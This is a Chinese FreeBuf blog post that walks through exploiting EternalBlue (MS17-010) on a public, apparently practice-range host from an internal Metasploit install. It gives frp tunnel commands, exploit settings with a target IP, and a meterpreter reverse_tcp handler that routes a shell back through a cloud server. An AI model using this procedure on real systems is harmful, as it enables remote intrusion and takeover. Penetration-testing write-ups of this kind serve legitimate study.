freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

看我用内网MSF打公网永恒之蓝
小惜 2022-08-21 09:43:41 175734
所属地 北京

image-20220811151438363

看我用内网MSF打公网永恒之蓝

存在疑问,网查没有,技术一般,重在思路,不喜勿喷

正常用msf打永恒之蓝漏洞的过程复现在网上一翻一大堆,不过基本上都是内网的两个虚拟机互打,然后之前我就冒出来个稀奇古怪的想法,假如这台带有永恒之蓝漏洞的服务器在公网上呢,我又不想在公网上装msf,怎么才能用内网msf碰到外网的漏洞呢?下面是我利用内网msf打公网的永恒之蓝的过程。

1. frp搭建

首先需要frp搭建隧道,将本地的4444端口,映射到公网云服务器的30001端口上,云服务器和本地分别下载frp按照如下配置

本地设置frpc.ini

image-20220807134036575

  • server_port是公网为了和内网建立frp隧道的端口

  • remote_port在这里代表要将本地4444端口映射到公网的30001端口上

  • local_ip注意要写内网IP不要写本地回环地址(127.0.0.1)

云服务器设置frps.ini

image-20220807135639843

frps.ini文件配置相对简单些,token对应上就行


然后本地和云服务器分别启动frp

#本地
./frpc -c ./frpc.ini
#云服务器
./frps -c ./frps.ini

开启后我们访问公网的30001端口就会直接穿到本地的4444上,例如我在本地用python开个http服务

image-20220807135941343

访问公网的30001

image-20220807140017031

至此frp配置完成


2. 攻击公网永恒之蓝

首先用在线靶场开个靶机

image-20220807140304778

之后打开msf并加载msf17-010攻击载荷

image-20220807140513506

注意这个载荷默认的payload是windows/x64/meterpreter/reverse_tcp这个后续要用到,然后设置配置项

options

set rhosts 52.81.73.86

set lhosts 云服务器地址

set lport 30001

这个时候先不要run,这里执行攻击是可以不过我们设置的回连地址是云服务器地址,端口是frp的那个端口,也就是代表它会穿到内网的4444端口来,但是当我们run时除了执行攻击载荷外,它还有一步就是根据设置的回连的地址和端口监听,也就是在本地监听公网所以自然监听不到,但是如果我们设置监听本地地址确实能监听到,但是回弹shell却弹不回来,这里就很难搞

这时候我们需要在启动一个msf,并且根据上面的默认payload设置本地监听

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost eth0

run

监听跑起来后再执行ms17-010攻击载荷,结果如下

image-20220807141805816

左边的攻击载荷反弹不回来session在预料之中,右边的监听成功接收到session


技术点没多难,只不过把我自己这个思路记录一下

# 渗透测试 # 内网渗透
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 小惜 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
小惜 LV.5
微信公众号:小惜渗透,欢迎大佬一起交流进步
  • 26 文章数
  • 39 关注者
【从0到1学免杀】--1. 加解密过静态
2024-06-07
【安卓】拿注册码的两种方式
2023-08-29
【红队攻防】个人总结、工具、大量干货
2023-07-24
文章目录